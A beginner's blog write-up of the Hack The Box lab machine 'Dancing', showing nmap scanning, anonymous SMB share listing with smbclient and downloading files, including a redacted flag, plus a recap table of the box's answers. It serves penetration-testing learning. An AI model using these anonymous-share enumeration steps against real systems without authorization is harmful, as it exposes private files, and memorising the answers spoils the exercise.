DEV Community

tamilvanan
tamilvanan

Posted on

πŸ•Ί Dancing | Hack The Box

Note: I’m not an expert. I’m writing this blog just to document my learning journey. πŸš€


πŸ”§ Step 1: Connect to Hack The Box

First, connect your system to the HTB VPN using the .ovpn config file.

sudo openvpn htb.ovpn
Enter fullscreen mode Exit fullscreen mode

Wait for the message:
Initialization Sequence Completed


🎯 Step 2: Get the Target IP

Click Spawn Machine on the HTB site to get the target IP.
Example IP:

10.129.22.153
Enter fullscreen mode Exit fullscreen mode

πŸ” Step 3: Scan with Nmap

Use Nmap to find open ports and running services:

nmap -A 10.129.22.153
Enter fullscreen mode Exit fullscreen mode

Key Results:

  • Port 135 – msrpc
  • Port 139 – netbios-ssn
  • Port 445 – microsoft-ds (SMB)

This confirms SMB is running on the target.


πŸ“¦ Step 4: What Is SMB?

SMB (Server Message Block) is a protocol used to share files and printers over a network β€” mostly on Windows systems.


🧰 Step 5: Install smbclient

smbclient lets us access SMB shares from the terminal.

Install it:

sudo apt update
sudo apt install smbclient
Enter fullscreen mode Exit fullscreen mode

πŸ“‚ Step 6: List Available Shares

Use smbclient to list the shares:

smbclient -L \\\\10.129.22.153\\ -N
Enter fullscreen mode Exit fullscreen mode

Output:

ADMIN$
C$
IPC$
WorkShares
Enter fullscreen mode Exit fullscreen mode

We’ll explore WorkShares β€” the only one that might be accessible.


πŸ”“ Step 7: Access WorkShares

smbclient \\\\10.129.22.153\\WorkShares -N
Enter fullscreen mode Exit fullscreen mode

Then list the contents:

ls
Enter fullscreen mode Exit fullscreen mode

Output:

Amy.J
James.P
Enter fullscreen mode Exit fullscreen mode

πŸ“ Step 8: Explore & Download Files

1. Get worknotes from Amy.J

cd Amy.J
ls
get worknotes.txt
Enter fullscreen mode Exit fullscreen mode

2. Get the flag from James.P

cd ..
cd James.P
ls
get flag.txt
exit
Enter fullscreen mode Exit fullscreen mode

πŸ“œ Step 9: Read the Flag

cat flag.txt
Enter fullscreen mode Exit fullscreen mode

Output:

<FLAG REDACTED>
Enter fullscreen mode Exit fullscreen mode

βœ… Recap

Question Answer
What does SMB stand for? Server Message Block
What port does SMB use? 445
What is the service on port 445? microsoft-ds
What flag lists shares in smbclient? -L
How many shares are listed? 4
Which share is accessible? WorkShares
Command to download a file? get
Final flag? <FLAG REDACTED>

πŸŽ‰ Conclusion

This box teaches basic SMB enumeration and shows how anonymous access to file shares can lead to information leaks.

Perfect starting point for anyone new to penetration testing.


Top comments (0)